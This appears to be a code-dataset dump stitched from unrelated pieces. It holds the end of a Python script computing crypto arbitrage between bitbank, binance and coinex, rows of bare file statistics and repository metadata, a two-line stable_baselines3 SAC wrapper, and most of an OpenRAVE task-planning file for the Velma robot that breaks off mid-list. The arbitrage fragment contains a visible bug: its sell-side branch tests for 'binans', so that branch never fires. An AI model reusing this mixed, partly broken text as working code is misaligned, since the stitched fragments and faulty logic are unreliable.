#'XRPを取引した場合の最低利益(jpy):'
minvalue = min([profit_bitbank_binance, profit_binance_bitbank, profit_bitbank_coinex,
profit_coinex_bitbank, profit_binance_coinex, profit_coinex_binance])
resultsample = {'bitbank_binance': profit_bitbank_binance,
'binance_bitbank': profit_binance_bitbank,
'bitbank_coinex': profit_bitbank_coinex,
'coinex_bitbank': profit_coinex_bitbank,
'binance_coinex': profit_binance_coinex,
'coinex_binance': profit_coinex_binance}
max_k = max(resultsample, key = resultsample.get)
print(max_k)
min_k = min(resultsample, key = resultsample.get)
print(min_k)
# 最大利益が出る取引所からいくら購入したのか
if max_k.startswith('bitbank'):
price_buy = bitbank_xrp_btc_ask
elif max_k.startswith('binance'):
price_buy = binance_xrp_btc.get("ask") * self
elif max_k.startswith('coinex'):
price_buy = coinex_xrp_btc.get("ask") * self
else:
price_buy = 0
# 最大利益が出る取引所からいくら売ったのか
if max_k.endswith('bitbank'):
price_sale = bitbank_xrp_btc_bid
elif max_k.endswith('binans'):
price_sale = binance_xrp_btc.get("bid") * self
elif max_k.endswith('coinex'): \
price_sale = coinex_xrp_btc.get("bid") * self
else:
price_sale = 0
resultarray = {'bitbank_binance': round(profit_bitbank_binance, 3),
'binance_bitbank': round(profit_binance_bitbank, 3),
'bitbank_coinex': round(profit_bitbank_coinex, 3),
'coinex_bitbank': round(profit_coinex_bitbank, 3),
'binance_coinex': round(profit_binance_coinex, 3),
'coinex_binance' : round(profit_coinex_binance, 3),
'max': max_k, 'min': min_k,
'maxvalue':round(maxvalue, 3), 'minvalue': round(minvalue, 3),
'max_buy': price_buy, 'min_sale': price_sale
}
return resultarray
except ccxt.BaseError:
print("取引所から取引データを取得できません。")
print("10秒待機してやり直します")
time.sleep(10)
def difference_btc_xrp(self):
"""取引所間でのBTC差額を求めるメソッド
(bitbank,binance,coinex)"""
while True:
try:
bitbanks = ccxt.bitbank()
bitbank_btc_jpy = bitbanks.fetch_ticker('BTC/JPY')
bitbank_xrp_jpy = bitbanks.fetch_ticker('XRP/JPY')
bitbank_btc_xrp_bid = (1 / bitbank_xrp_jpy.get("bid")) / (1 / bitbank_btc_jpy.get("ask")) * self
bitbank_btc_xrp_ask = (1 / bitbank_xrp_jpy.get("ask")) / (1 / bitbank_btc_jpy.get("bid")) * self
print(bitbank_btc_xrp_ask)
print(bitbank_btc_xrp_bid)
# binanceからXRP/BTC通貨情報取得
binances = ccxt.binance()
binance_xrp_btc = binances.fetch_ticker('XRP/BTC')
print(binance_xrp_btc.get("ask"))
binance_xrp_btc_ask = (1 / binance_xrp_btc.get("ask")) * self
print(binance_xrp_btc.get("bid"))
binance_xrp_btc_bid = (1 / binance_xrp_btc.get("bid")) * self
# coinexからXRP/BTC通貨情報取得
coinex = ccxt.coinex()
coinex_xrp_btc = coinex.fetch_ticker('XRP/BTC')
print(coinex_xrp_btc.get("ask"))
coinex_xrp_btc_ask = (1 / coinex_xrp_btc.get("ask")) * self
print(coinex_xrp_btc.get("bid"))
coinex_xrp_btc_bid = (1 / coinex_xrp_btc.get("bid")) * self
# bitbankとbinance間の差額
profit_bitbank_binance = (binance_xrp_btc_bid - bitbank_btc_xrp_ask) * bitbank_xrp_jpy.get(
"bid")
profit_binance_bitbank = (bitbank_btc_xrp_bid - binance_xrp_btc_ask) * bitbank_xrp_jpy.get(
"bid")
# bitbankとcoinex間の差額
profit_bitbank_coinex = (coinex_xrp_btc_bid - bitbank_btc_xrp_ask) * bitbank_xrp_jpy.get(
"bid")
profit_coinex_bitbank = (bitbank_btc_xrp_bid - coinex_xrp_btc_ask) * bitbank_xrp_jpy.get(
"bid")
# binanceとcoinex間の差額
profit_binance_coinex = (coinex_xrp_btc_bid - (binance_xrp_btc_ask)) * bitbank_xrp_jpy.get("bid")
profit_coinex_binance = (binance_xrp_btc_bid - (coinex_xrp_btc_ask)) * bitbank_xrp_jpy.get("bid")
resultsample = {'bitbank_binance': profit_bitbank_binance,
'binance_bitbank': profit_binance_bitbank,
'bitbank_coinex': profit_bitbank_coinex,
'coinex_bitbank': profit_coinex_bitbank,
'binance_coinex': profit_binance_coinex,
'coinex_binance': profit_coinex_binance}
max_k = max(resultsample, key = resultsample.get)
print(max_k)
min_k = min(resultsample, key = resultsample.get)
print(min_k)
# 最大利益が出る取引所からいくら購入したのか
if max_k.startswith('bitbank'):
price_buy = bitbank_btc_xrp_ask
elif max_k.startswith('binance'):
price_buy = binance_xrp_btc_ask
elif max_k.startswith('coinex'):
price_buy = coinex_xrp_btc_ask
else:
price_buy = 0
# 最大利益が出る取引所からいくら売ったのか
if max_k.endswith('bitbank'):
price_sale = bitbank_btc_xrp_bid
elif max_k.endswith('binance'):
price_sale = binance_xrp_btc_bid
elif max_k.endswith('coinex'): \
price_sale = coinex_xrp_btc_bid
else:
price_sale = 0
# 'BTCを取引した場合の最大利益(jpy):'
maxvalue = max([profit_bitbank_binance, profit_binance_bitbank, profit_bitbank_coinex,
profit_coinex_bitbank, profit_binance_coinex, profit_coinex_binance])
# 'BTCを取引した場合の最低利益(jpy):'
minvalue = min([profit_bitbank_binance, profit_binance_bitbank, profit_bitbank_coinex,
profit_coinex_bitbank, profit_binance_coinex, profit_coinex_binance])
resultarray = {'bitbank_binance': round(profit_bitbank_binance, 3),
'binance_bitbank': round(profit_binance_bitbank, 3),
'bitbank_coinex': round(profit_bitbank_coinex, 3),
'coinex_bitbank': round(profit_coinex_bitbank, 3),
'binance_coinex': round(profit_binance_coinex, 3),
'coinex_binance': round(profit_coinex_binance, 3),
'max': max_k, 'min': min_k,
'maxvalue': round(maxvalue, 3), 'minvalue': round(minvalue, 3),
'max_buy': round(price_buy * bitbank_xrp_jpy.get("bid"), 3),
'min_sale': round(price_sale * bitbank_xrp_jpy.get("bid"), 3)
}
return resultarray
except ccxt.BaseError:
print("取引所から取引データを取得できません。")
print("10秒待機してやり直します")
time.sleep(10)
def difference_ltc_btc(self):
"""取引所間でのLTC差額を求めるメソッド
(bitbank,binance,coinex)"""
while True:
try:
bitbanks = ccxt.bitbank()
bitbank_btc_jpy = bitbanks.fetch_ticker('BTC/JPY')
bitbank_ltc_btc = bitbanks.fetch_ticker('LTC/BTC')
bitbank_ltc_btc_bid = bitbank_ltc_btc.get("bid") * self
bitbank_ltc_btc_ask = bitbank_ltc_btc.get("ask") * self
print(bitbank_ltc_btc_ask)
print(bitbank_ltc_btc_bid)
# binanceからXRP/BTC通貨情報取得
binances = ccxt.binance()
binance_xrp_btc = binances.fetch_ticker('LTC/BTC')
print(binance_xrp_btc.get("ask"))
binance_ltc_btc_ask = (binance_xrp_btc.get("ask")) * self
print(binance_xrp_btc.get("bid"))
binance_ltc_btc_bid = (binance_xrp_btc.get("bid")) * self
# bitbankとbinance間の差額
profit_bitbank_binance = (binance_ltc_btc_bid - bitbank_ltc_btc_ask) * bitbank_btc_jpy.get(
"bid")
profit_binance_bitbank = (bitbank_ltc_btc_bid - binance_ltc_btc_ask) * bitbank_btc_jpy.get(
"bid")
resultsample = {'bitbank_binance': profit_bitbank_binance,
'binance_bitbank': profit_binance_bitbank,}
max_k = max(resultsample, key = resultsample.get)
print(max_k)
min_k = min(resultsample, key = resultsample.get)
print(min_k)
# 最大利益が出る取引所からいくら購入したのか
if max_k.startswith('bitbank'):
price_buy = bitbank_ltc_btc_ask * bitbank_btc_jpy.get(
"bid")
print(bitbank_ltc_btc_ask)
elif max_k.startswith('binance'):
price_buy = binance_ltc_btc_ask * bitbank_btc_jpy.get(
"bid")
else:
price_buy = 0
# 最大利益が出る取引所からいくら売ったのか
if max_k.endswith('bitbank'):
price_sale = bitbank_ltc_btc_bid * bitbank_btc_jpy.get(
"bid")
elif max_k.endswith('binance'):
price_sale = binance_ltc_btc_bid * bitbank_btc_jpy.get(
"bid")
else:
price_sale = 0
# 'BTCを取引した場合の最大利益(jpy):'
maxvalue = max([profit_bitbank_binance, profit_binance_bitbank])
# 'BTCを取引した場合の最低利益(jpy):'
minvalue = min([profit_bitbank_binance, profit_binance_bitbank])
resultarray = {'bitbank_binance': round(profit_bitbank_binance, 3),
'binance_bitbank': round(profit_binance_bitbank, 3),
'max': max_k, 'min': min_k,
'maxvalue': round(maxvalue, 3), 'minvalue': round(minvalue, 3),
'max_buy': round(price_buy, 3), 'min_sale': round(price_sale, 3)
}
return resultarray
except ccxt.BaseError:
print("取引所から取引データを取得できません。")
print("10秒待機してやり直します")
time.sleep(10)
if __name__ == "__main__":
print(CALCULATION.difference_xrp_btc(1))
#print("%.13f" % CALCULATION.difference_xrp_btc(2)['max'])
print(CALCULATION.difference_btc_xrp(1))
#print(CALCULATION.difference_btc_xrp(3))
print(CALCULATION.difference_ltc_btc(1))
| 48.878136
| 134
| 0.537948
| 1,350
| 13,637
| 5.028148
| 0.056296
| 0.053035
| 0.047879
| 0.037714
| 0.917796
| 0.869328
| 0.830141
| 0.801267
| 0.783441
| 0.736447
| 0
| 0.006642
| 0.370683
| 13,637
| 279
| 135
| 48.878136
| 0.784316
| 0.056391
| 0
| 0.653659
| 0
| 0
| 0.075609
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.014634
| false
| 0
| 0.014634
| 0
| 0.04878
| 0.126829
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
b88d89dd0b57d0b362799f326dcbb0299b01488b
| 74
|
py
|
Python
|
yacht/agents/sac.py
|
IusztinPaul/yacht
|
c68ab7c66bde860bb91534c29e97772ba328adb5
|
[
"Apache-2.0"
] | 5
|
2021-09-03T10:16:50.000Z
|
2022-02-28T07:32:43.000Z
|
yacht/agents/sac.py
|
IusztinPaul/yacht
|
c68ab7c66bde860bb91534c29e97772ba328adb5
|
[
"Apache-2.0"
] | null | null | null |
yacht/agents/sac.py
|
IusztinPaul/yacht
|
c68ab7c66bde860bb91534c29e97772ba328adb5
|
[
"Apache-2.0"
] | 1
|
2022-03-05T16:06:46.000Z
|
2022-03-05T16:06:46.000Z
|
from stable_baselines3 import SAC as SB3SAC
class SAC(SB3SAC):
pass
| 12.333333
| 43
| 0.756757
| 11
| 74
| 5
| 0.818182
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.050847
| 0.202703
| 74
| 5
| 44
| 14.8
| 0.881356
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 6
|
b8a1479d9b504f915305522fdc68c0fe51d1b1be
| 38,170
|
py
|
Python
|
scripts/tasks.py
|
dseredyn/velma_scripts
|
26691f621ba0d4f771ddca6ecce0e49e5164123f
|
[
"BSD-3-Clause"
] | null | null | null |
scripts/tasks.py
|
dseredyn/velma_scripts
|
26691f621ba0d4f771ddca6ecce0e49e5164123f
|
[
"BSD-3-Clause"
] | null | null | null |
scripts/tasks.py
|
dseredyn/velma_scripts
|
26691f621ba0d4f771ddca6ecce0e49e5164123f
|
[
"BSD-3-Clause"
] | null | null | null |
# Copyright (c) 2015, Robot Control and Pattern Recognition Group,
# Institute of Control and Computation Engineering
# Warsaw University of Technology
#
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the Warsaw University of Technology nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL <COPYright HOLDER> BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Author: Dawid Seredynski
#
import PyKDL
import numpy as np
import math
import random
import operator
from openravepy import *
import headkinematics
import velmautils
import tree
import conversions as conv
import pose_lookup_table_left as plutl
import pose_lookup_table_right as plutr
class LooAtTaskRRT:
def __init__(self, openrave, args):
self.openrave = openrave
v_rot = 0.800
v_lean = 0.375
v_head = 0.392
h_cam = 0.0
v_cam = 0.225
self.head_kin = headkinematics.HeadKinematics(v_rot, v_lean, v_head, h_cam, v_cam)
self.kinect_fov = 30.0/180.0*math.pi
# target: key pocket
self.vis_targets = [
("vis_target_0", 0.1, PyKDL.Vector(0, -0.4, 1.0)),
("vis_target_1", 0.1, PyKDL.Vector(0.1, -0.4, 1.0)),
("vis_target_2", 0.1, PyKDL.Vector(0.1, -0.5, 1.0)),
("vis_target_3", 0.1, PyKDL.Vector(0, -0.5, 1.0)),
# ("vis_target_4", 0.1, PyKDL.Vector(0.05, -0.45, 1.0)),
]
self.head_target_B = PyKDL.Vector()
for target in self.vis_targets:
self.head_target_B += target[2]
self.head_target_B = self.head_target_B / len(self.vis_targets)
self.vis_bodies = []
# target: test (vertical axis at the door plane)
# self.vis_targets = [
# ("vis_target_0", 0.1, PyKDL.Vector(1, 0.0, 1.2)),
# ("vis_target_1", 0.1, PyKDL.Vector(1, 0.0, 1.3)),
# ("vis_target_2", 0.1, PyKDL.Vector(1, 0.0, 1.4)),
# ("vis_target_3", 0.1, PyKDL.Vector(1, 0.0, 1.5)),
# ("vis_target_4", 0.1, PyKDL.Vector(1, 0.0, 1.6)),
# ]
for (name, diam, pos) in self.vis_targets:
body = self.openrave.addSphere(name, diam)
body.SetTransform(conv.KDLToOpenrave(PyKDL.Frame(pos)))
self.vis_bodies.append( body )
self.openrave.env.Remove( body )
self.dof_names = [
"head_pan_joint",
"head_tilt_joint",
"left_arm_0_joint",
"left_arm_1_joint",
"left_arm_2_joint",
"left_arm_3_joint",
"right_arm_0_joint",
"right_arm_1_joint",
"right_arm_2_joint",
"right_arm_3_joint",
"torso_0_joint",
]
self.dof_indices = []
self.dof_limits = []
for joint_name in self.dof_names:
joint = openrave.robot_rave.GetJoint(joint_name)
self.dof_indices.append( joint.GetDOFIndex() )
lim_lo, lim_up = joint.GetLimits()
self.dof_limits.append( (lim_lo[0], lim_up[0]) )
self.dof_indices_map = {}
for i in range(len(self.dof_names)):
self.dof_indices_map[self.dof_names[i]] = i
self.other_dof = []
def GetOtherDofIndices(self):
return self.other_dof
def GetDofLimits(self):
return self.dof_limits
def GetDofIndices(self):
return self.dof_indices
def GetDofNames(self):
return self.dof_names
def getActiveDOF(self, q):
q_ret = np.empty(len(self.dof_indices))
q_ret_idx = 0
for dof_idx in self.dof_indices:
q_ret[q_ret_idx] = q[dof_idx]
q_ret_idx += 1
return q_ret
def checkGoal(self, q):
self.openrave.switchCollisionModel("velmasimplified0")
rays_hit = 0
m_id = 0
self.openrave.robot_rave.SetDOFValues(q, self.dof_indices)
for body in self.vis_bodies:
self.openrave.env.Add( body )
T_W_C = conv.OpenraveToKDL(self.openrave.robot_rave.GetLink("head_kinect_rgb_optical_frame").GetTransform())
T_C_W = T_W_C.Inverse()
cam_W = T_W_C * PyKDL.Vector()
cam_dir_W = PyKDL.Frame(T_W_C.M) * PyKDL.Vector(0,0,0.5)
# create rays connecting the optical frame and the target objects
for (name, diam, pos_W) in self.vis_targets:
pos_C = T_C_W * pos_W
dir_W = pos_W - cam_W
if pos_C.z() < 0.1:
continue
if velmautils.getAngle(PyKDL.Vector(0,0,1), pos_C) > self.kinect_fov:
continue
report = CollisionReport()
ret = self.openrave.env.CheckCollision(Ray((cam_W[0], cam_W[1], cam_W[2]), (dir_W[0], dir_W[1], dir_W[2])), report)
if ret and report.plink1 != None and report.plink1.GetParent().GetName().find("vis_target_") == 0:
rays_hit += 1
else:
pass
for body in self.vis_bodies:
self.openrave.env.Remove( body )
return rays_hit == 4
def SampleGoal(self, start_q, shortest_path_len):
ignore_dof = [self.dof_indices_map["torso_0_joint"], self.dof_indices_map["head_pan_joint"], self.dof_indices_map["head_tilt_joint"]]
q_goal = np.empty(len(self.dof_names))
for tries in range(200):
torso_0_joint_idx = self.dof_indices_map["torso_0_joint"]
q_goal[torso_0_joint_idx] = random.uniform(self.dof_limits[torso_0_joint_idx][0]+0.01, self.dof_limits[torso_0_joint_idx][1]-0.01)
self.head_kin.UpdateTorsoPose(q_goal[self.dof_indices_map["torso_0_joint"]], self.openrave.robot_rave.GetJoint("torso_1_joint").GetValue(0))
self.head_kin.UpdateTargetPosition(self.head_target_B.x(), self.head_target_B.y(), self.head_target_B.z())
self.head_kin.TransformTargetToHeadFrame()
joint_pan, joint_tilt = self.head_kin.CalculateHeadPose()
if joint_pan == None:
continue
joint_pan = max(joint_pan, self.dof_limits[self.dof_indices_map["head_pan_joint"]][0])
joint_pan = min(joint_pan, self.dof_limits[self.dof_indices_map["head_pan_joint"]][1])
joint_tilt = max(joint_tilt, self.dof_limits[self.dof_indices_map["head_tilt_joint"]][0])
joint_tilt = min(joint_tilt, self.dof_limits[self.dof_indices_map["head_tilt_joint"]][1])
q_goal[self.dof_indices_map["head_pan_joint"]] = joint_pan
q_goal[self.dof_indices_map["head_tilt_joint"]] = joint_tilt
if shortest_path_len == None:
for i in range(len(self.dof_names)):
if i in ignore_dof:
continue
q_goal[i] = random.uniform(self.dof_limits[i][0]+0.01, self.dof_limits[i][1]-0.01)
else:
diff = 0.0
for dof_idx in ignore_dof:
diff += (start_q[dof_idx] - q_goal[dof_idx]) * (start_q[dof_idx] - q_goal[dof_idx])
shortest_path_len2 = shortest_path_len*shortest_path_len - diff
if shortest_path_len2 < 0.0:
continue
shortest_path_len2 = math.sqrt(shortest_path_len2)
q_goal2 = tree.uniformInBall(shortest_path_len2, self.dof_limits, start_q, ignore_dof=ignore_dof)
for dof_idx in ignore_dof:
q_goal2[dof_idx] = q_goal[dof_idx]
q_goal = q_goal2
# sanity check
if shortest_path_len != None and np.linalg.norm(q_goal-start_q) > shortest_path_len:
print "ERROR: np.linalg.norm(q_goal-start_q) > shortest_path_len", np.linalg.norm(q_goal-start_q), ">", shortest_path_len
exit(0)
if self.checkGoal(q_goal):
return [q_goal]
return None
class KeyRotTaskRRT:
def __init__(self, openrave, args):
self.openrave = openrave
self.T_E_O = PyKDL.Frame()
self.T_O_E = self.T_E_O.Inverse()
self.key_axis_O = PyKDL.Vector(0,0,1)
self.key_up_O = PyKDL.Vector(1,0,0)
self.key_side_O = self.key_axis_O * self.key_up_O
self.key_endpoint_O = PyKDL.Vector(0.000256401261281, -0.000625166847342, 0.232297442735)
self.T_B_O_nearHole = PyKDL.Frame(PyKDL.Rotation.Quaternion(0.71891504857, -0.0529880479354, 0.691118088949, 0.0520500417212), PyKDL.Vector(0.883081316461, -0.100813768303, 0.95381559114))
# get the transformation from wrist to palm
link_E = self.openrave.robot_rave.GetLink("right_HandPalmLink")
link_W = self.openrave.robot_rave.GetLink("right_arm_7_link")
T_World_E = conv.OpenraveToKDL(link_E.GetTransform())
T_World_W = conv.OpenraveToKDL(link_W.GetTransform())
self.T_W_E = T_World_W.Inverse() * T_World_E
self.T_E_W = self.T_W_E.Inverse()
self.key_traj1_T_B_W = []
for angle in np.linspace(0.0/180.0*math.pi, -180.0/180.0*math.pi, 10):
T_B_W = self.T_B_O_nearHole * PyKDL.Frame(PyKDL.Rotation.Rot(self.key_axis_O, angle)) * self.T_O_E * self.T_E_W
self.key_traj1_T_B_W.append( (T_B_W, angle) )
self.key_traj2_T_B_W = []
for angle in np.linspace(0.0/180.0*math.pi, 180.0/180.0*math.pi, 10):
T_B_W = self.T_B_O_nearHole * PyKDL.Frame(PyKDL.Rotation.Rot(self.key_axis_O, angle)) * self.T_O_E * self.T_E_W
self.key_traj2_T_B_W.append( (T_B_W, angle) )
self.velma_solvers = velmautils.VelmaSolvers()
self.dof_names = [
"left_arm_0_joint",
"left_arm_1_joint",
"left_arm_2_joint",
"left_arm_3_joint",
"right_arm_0_joint",
"right_arm_1_joint",
"right_arm_2_joint",
"right_arm_3_joint",
"right_arm_4_joint",
"right_arm_5_joint",
"right_arm_6_joint",
"torso_0_joint",
]
self.dof_indices = []
self.dof_limits = []
for joint_name in self.dof_names:
joint = openrave.robot_rave.GetJoint(joint_name)
self.dof_indices.append( joint.GetDOFIndex() )
lim_lo, lim_up = joint.GetLimits()
self.dof_limits.append( (lim_lo[0], lim_up[0]) )
self.dof_names_ik = [
"right_arm_0_joint",
"right_arm_1_joint",
"right_arm_2_joint",
"right_arm_3_joint",
"right_arm_4_joint",
"right_arm_5_joint",
"right_arm_6_joint",
]
self.dof_indices_map = {}
for i in range(len(self.dof_names)):
self.dof_indices_map[self.dof_names[i]] = i
self.free_dof_idx = self.dof_indices_map[self.openrave.free_joint["right_arm"]]
self.torso_0_joint_idx = self.dof_indices_map["torso_0_joint"]
self.ignore_dof = [
self.dof_indices_map["torso_0_joint"],
self.dof_indices_map["right_arm_0_joint"],
self.dof_indices_map["right_arm_1_joint"],
self.dof_indices_map["right_arm_2_joint"],
self.dof_indices_map["right_arm_3_joint"],
self.dof_indices_map["right_arm_4_joint"],
self.dof_indices_map["right_arm_5_joint"],
self.dof_indices_map["right_arm_6_joint"]]
self.other_dof = []
for dof_name in self.dof_names:
dof_idx = self.dof_indices_map[dof_name]
if not dof_idx in self.ignore_dof:
self.other_dof.append(dof_idx)
def GetOtherDofIndices(self):
return self.other_dof
def GetDofLimits(self):
return self.dof_limits
def GetDofIndices(self):
return self.dof_indices
def GetDofNames(self):
return self.dof_names
def getActiveDOF(self, q):
q_ret = np.empty(len(self.dof_indices))
q_ret_idx = 0
for dof_idx in self.dof_indices:
q_ret[q_ret_idx] = q[dof_idx]
q_ret_idx += 1
return q_ret
def checkGoal(self, q):
# interpolate trajectory (in the cartesian space)
self.openrave.robot_rave.SetDOFValues(q, self.dof_indices)
link_E = self.openrave.robot_rave.GetLink("right_HandPalmLink")
T_World_E = conv.OpenraveToKDL(link_E.GetTransform())
T_B_O = self.openrave.T_World_Br.Inverse() * T_World_E * self.T_E_O
diff = PyKDL.diff(self.T_B_O_nearHole, T_B_O)
if diff.vel.Norm() > 0.02 or diff.rot.Norm() > 10.0/180.0*math.pi:
return False
angle1 = 0.0
for T_B_W, angle in self.key_traj1_T_B_W:
init_js = self.openrave.getRobotConfigurationRos()
traj = self.velma_solvers.getCartImpWristTraj(init_js, T_B_W)
if traj == None:
break
angle1 = angle
qar = {}
for qi in range(len(traj[-1])):
qar["right_arm_"+str(qi)+"_joint"] = traj[-1][qi]
self.openrave.updateRobotConfigurationRos(qar)
self.openrave.robot_rave.SetDOFValues(q, self.dof_indices)
angle2 = 0.0
for T_B_W, angle in self.key_traj2_T_B_W:
init_js = self.openrave.getRobotConfigurationRos()
traj = self.velma_solvers.getCartImpWristTraj(init_js, T_B_W)
if traj == None:
break
angle2 = angle
qar = {}
for qi in range(len(traj[-1])):
qar["right_arm_"+str(qi)+"_joint"] = traj[-1][qi]
self.openrave.updateRobotConfigurationRos(qar)
if abs(angle1-angle2) > 190.0/180.0*math.pi:
return True
else:
return False
def SampleGoal(self, start_q, shortest_path_len):
self.openrave.switchCollisionModel("velmasimplified0")
start_arm_q = np.empty(len(self.dof_names_ik))
for dof_ik_idx in range(len(self.dof_names_ik)):
start_arm_q[dof_ik_idx] = start_q[self.dof_indices_map[self.dof_names_ik[dof_ik_idx]]]
T_B_E = self.T_B_O_nearHole * self.T_O_E
q_goal = np.zeros(len(self.dof_names))
for tries in range(50):
# random free joint value for the arm
q_goal[self.free_dof_idx] = random.uniform(self.dof_limits[self.free_dof_idx][0]+0.01, self.dof_limits[self.free_dof_idx][1]-0.01)
freevalues = [ (q_goal[self.free_dof_idx]-self.dof_limits[self.free_dof_idx][0])/(self.dof_limits[self.free_dof_idx][1]-self.dof_limits[self.free_dof_idx][0]) ]
# random torso joint value
q_goal[self.torso_0_joint_idx] = random.uniform(self.dof_limits[self.torso_0_joint_idx][0]+0.01, self.dof_limits[self.torso_0_joint_idx][1]-0.01)
self.openrave.robot_rave.SetDOFValues(q_goal, self.dof_indices)
solutions = self.openrave.findIkSolutions(T_B_E, man_name="right_arm", freevalues=freevalues, filter_options=0)
# solutions_dist = []
# # sort the solutions
# for sol in solutions:
# dist = np.linalg.norm(start_arm_q-np.array(sol))
# solutions_dist.append( (dist, sol) )
# sorted_solutions = sorted(solutions_dist, key=operator.itemgetter(0))
goal_list = []
# for dist, sol in sorted_solutions:
for sol in solutions:
for arm_dof_idx in range(len(self.dof_names_ik)):
dof_name = self.dof_names_ik[arm_dof_idx]
q_goal[self.dof_indices_map[dof_name]] = sol[arm_dof_idx]
if shortest_path_len == None:
for i in range(len(self.dof_names)):
if i in self.ignore_dof:
continue
q_goal[i] = random.uniform(self.dof_limits[i][0]+0.01, self.dof_limits[i][1]-0.01)
else:
diff = 0.0
for dof_idx in self.ignore_dof:
diff += (start_q[dof_idx] - q_goal[dof_idx]) * (start_q[dof_idx] - q_goal[dof_idx])
shortest_path_len2 = shortest_path_len*shortest_path_len - diff
if shortest_path_len2 < 0.0:
continue
shortest_path_len2 = math.sqrt(shortest_path_len2)
q_goal2 = tree.uniformInBall(shortest_path_len2, self.dof_limits, start_q, ignore_dof=self.ignore_dof)
for dof_idx in self.ignore_dof:
q_goal2[dof_idx] = q_goal[dof_idx]
q_goal = q_goal2
# sanity check
if shortest_path_len != None and np.linalg.norm(q_goal-start_q) > shortest_path_len:
print "ERROR: np.linalg.norm(q_goal-start_q) > shortest_path_len", np.linalg.norm(q_goal-start_q), ">", shortest_path_len
exit(0)
if self.checkGoal(q_goal):
goal_list.append(q_goal)
# return q_goal
if len(goal_list) > 0:
return goal_list
return None
class MoveArmsCloseTaskRRT:
def __init__(self, openrave, args):
self.openrave = openrave
self.dof_names = [
"left_arm_0_joint",
"left_arm_1_joint",
"left_arm_2_joint",
"left_arm_3_joint",
"left_arm_4_joint",
"left_arm_5_joint",
"left_arm_6_joint",
"right_arm_0_joint",
"right_arm_1_joint",
"right_arm_2_joint",
"right_arm_3_joint",
"right_arm_4_joint",
"right_arm_5_joint",
"right_arm_6_joint",
]
self.dof_tol = [
(1.8, 2.3),
(1.9, 2.06),
(-1.2, -1.0),
(-2.06, -1.9),
None,
None,
None,
(0.7, 1.2),
(-2.06, -1.9),
(1.0, 1.2),
(1.9, 2.06),
None,
None,
None,
]
self.dof_indices = []
self.dof_limits = []
dof_idx = 0
for joint_name in self.dof_names:
joint = openrave.robot_rave.GetJoint(joint_name)
self.dof_indices.append( joint.GetDOFIndex() )
lim_lo, lim_up = joint.GetLimits()
self.dof_limits.append( (lim_lo[0], lim_up[0]) )
if self.dof_tol[dof_idx] == None:
self.dof_tol[dof_idx] = (lim_lo[0], lim_up[0])
dof_idx += 1
self.dof_indices_map = {}
for i in range(len(self.dof_names)):
self.dof_indices_map[self.dof_names[i]] = i
self.other_dof = []
def GetOtherDofIndices(self):
return self.other_dof
def GetDofLimits(self):
return self.dof_limits
def GetDofIndices(self):
return self.dof_indices
def GetDofNames(self):
return self.dof_names
def getActiveDOF(self, q):
q_ret = np.empty(len(self.dof_indices))
q_ret_idx = 0
for dof_idx in self.dof_indices:
q_ret[q_ret_idx] = q[dof_idx]
q_ret_idx += 1
return q_ret
def checkGoal(self, q):
for q_idx in range(len(q)):
if q[q_idx] < self.dof_tol[q_idx][0] or q[q_idx] > self.dof_tol[q_idx][1]:
return False
return True
def SampleGoal(self, start_q, shortest_path_len):
q_goal = np.empty(len(self.dof_names))
for i in range(len(self.dof_names)):
q_goal[i] = random.uniform(self.dof_tol[i][0], self.dof_tol[i][1])
return [q_goal]
class GraspTaskRRT:
def __init__(self, openrave, args):
if len(args) != 2:
raise ValueError('GraspTaskRRT: wrong number of arguments: ' + str(len(args)))
if args[0] != "left" and args[0] != "right":
raise ValueError('GraspTaskRRT: wrong argument[0] value: ' + args[0])
if len(args[1]) == 0:
raise ValueError('GraspTaskRRT: wrong argument[1] value')
self.openrave = openrave
self.gripper = args[0]
self.T_B_E_list = args[1]
# get the transformation from wrist to palm
link_E = self.openrave.robot_rave.GetLink(self.gripper + "_HandPalmLink")
link_W = self.openrave.robot_rave.GetLink(self.gripper + "_arm_7_link")
T_World_E = conv.OpenraveToKDL(link_E.GetTransform())
T_World_W = conv.OpenraveToKDL(link_W.GetTransform())
self.T_W_E = T_World_W.Inverse() * T_World_E
self.T_E_W = self.T_W_E.Inverse()
self.dof_names = [
"left_arm_0_joint",
"left_arm_1_joint",
"left_arm_2_joint",
"left_arm_3_joint",
